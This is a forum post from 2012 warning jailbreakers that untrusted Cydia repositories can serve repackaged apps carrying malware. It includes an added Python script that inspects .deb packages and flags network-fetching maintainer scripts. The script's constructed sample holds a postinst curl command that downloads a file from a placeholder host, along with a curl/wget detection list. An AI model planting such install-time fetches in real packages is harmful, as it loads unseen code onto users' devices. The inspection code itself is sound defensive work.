Be careful in adding sources to Cydia


Mar 28, 2012
I'm writing this because I'm beginning to see a lot of sources for free versions of paid apps/tweaks, and to explain why you should stay away from them.

I have used Linux distros as my sole operating system for over 10 years. Linux distros use what are known as package managers to manage apps. One of the more popular package managers is the Debian package manager, which is what Cydia uses.

Package managers rely on what are known as "sources". Sources tell the package manager, among other things, where to find packages. The packages are maintained in "repos" on a server somewhere. The package manager uses the sources to contact the repos in order to verify and install apps.

Now, it's very easy to set up a repo, and it's very easy to add sources for any repo to a package manager. But what we have to ask ourselves is, "what is in the packages in those repos?"

Scenario #1 (trusted sources):
1. Create an app
2. Add it to a repo
3. Let the public know about the sources for said repo
4. The public adds the sources and installs apps

Scenario #2 (untrusted sources):
1. Download an app
2. Re-write the app to include whatever you want in it
3. Add it to a repo
4. Let the public know about the sources for said repo
5. The public adds the sources and installs apps

Scenario #1 is what we see happening in Cydia: it already comes with sources for officially accepted apps. This is an example of trusted sources.

Scenario #2 is what would happen if I were to, say, re-write an app to include trojans, viruses, malware or rootkits, or to download them at a later time. The sources and apps appear to be legitimate, but my apps will download other apps from outside the repos and/or install anything I want on your device. This is an example of untrusted sources.

Scenario #1 is what we want. Scenario #2 is what you want to steer clear of because you don't really know what you're installing.

How can we differentiate between trusted and untrusted sources? We can't, not without research. The problem is that the average user won't know what research is involved or what to look for.
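One piece of that research can be done before installing anything: open the package itself and look at what it carries. The following script is an added example, not code from the original post or from Cydia; it parses a .deb (an ar archive wrapping a control tarball and a data tarball), lists the maintainer scripts and the files the package would install, and flags a maintainer script that fetches content from outside the repo, which is the pattern described in Scenario #2. The sample package bytes are constructed inside the script, and the package name, file path and URL in it are placeholders.

```python
import io, tarfile

AR_MAGIC = b"!<arch>\n"  # a .deb is an ar archive holding debian-binary, control.tar.* and data.tar.*
def build_ar(members):
    # Minimal ar writer, used only to construct the sample package below
    out = AR_MAGIC
    for name, data in members:  # 60-byte header, then data padded to an even length
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode() + data
        out += b"\n" if len(data) % 2 else b""
    return out
def tar_gz(files):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, content in files.items():
            info = tarfile.TarInfo(name); info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()
def parse_ar(blob):
    # Walk the fixed 60-byte ar headers; the decimal size field sits at bytes 48..58 of each header
    assert blob.startswith(AR_MAGIC), "not an ar archive"
    pos, members = len(AR_MAGIC), {}
    while pos + 60 <= len(blob):
        name, size = blob[pos:pos + 16].decode().strip().rstrip("/"), int(blob[pos + 48:pos + 58])
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)
    return members
def inspect_deb(blob):
    # Read the maintainer scripts and the file list without installing anything
    members = parse_ar(blob)
    ctrl, data = (next(v for k, v in members.items() if k.startswith(p)) for p in ("control.tar", "data.tar"))
    scripts = {}
    with tarfile.open(fileobj=io.BytesIO(ctrl)) as tf:
        for m in tf.getmembers():
            if m.isfile() and m.name.lstrip("./") in ("preinst", "postinst", "prerm", "postrm"):
                scripts[m.name.lstrip("./")] = tf.extractfile(m).read().decode()
    with tarfile.open(fileobj=io.BytesIO(data)) as tf:
        paths = [m.name for m in tf.getmembers() if m.isfile()]
    return {"scripts": scripts, "paths": paths}
def red_flags(report):
    # Heuristic: a maintainer script that reaches the network pulls in content the repo never showed you
    return [f"{name} fetches content from outside the repo"
            for name, body in report["scripts"].items()
            if any(tok in body for tok in ("curl ", "wget ", "http://", "https://"))]

SAMPLE_DEB = build_ar([  # constructed sample: a repackaged tweak whose postinst downloads more at install time
    ("debian-binary", b"2.0\n"),
    ("control.tar.gz", tar_gz({"control": b"Package: com.example.tweak\nVersion: 1.0\n",
                               "postinst": b"#!/bin/sh\ncurl -o /tmp/extra http://example.invalid/extra\n"})),
    ("data.tar.gz", tar_gz({"./Library/MobileSubstrate/DynamicLibraries/Tweak.dylib": b"\xca\xfe"})),
])
```

Running `red_flags(inspect_deb(SAMPLE_DEB))` on the constructed package reports the postinst fetch; a package whose scripts stay offline produces an empty list, which is still only a starting point for looking at what the listed files actually are.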

Moral of the story: Don't add sources to Cydia until you know what you're getting yourself into; you could be asking for more than you bargained for. If you want a paid app, pay for it. You'll be rewarding the developer, keeping your device safe, and you can expect upgrades and fixes.

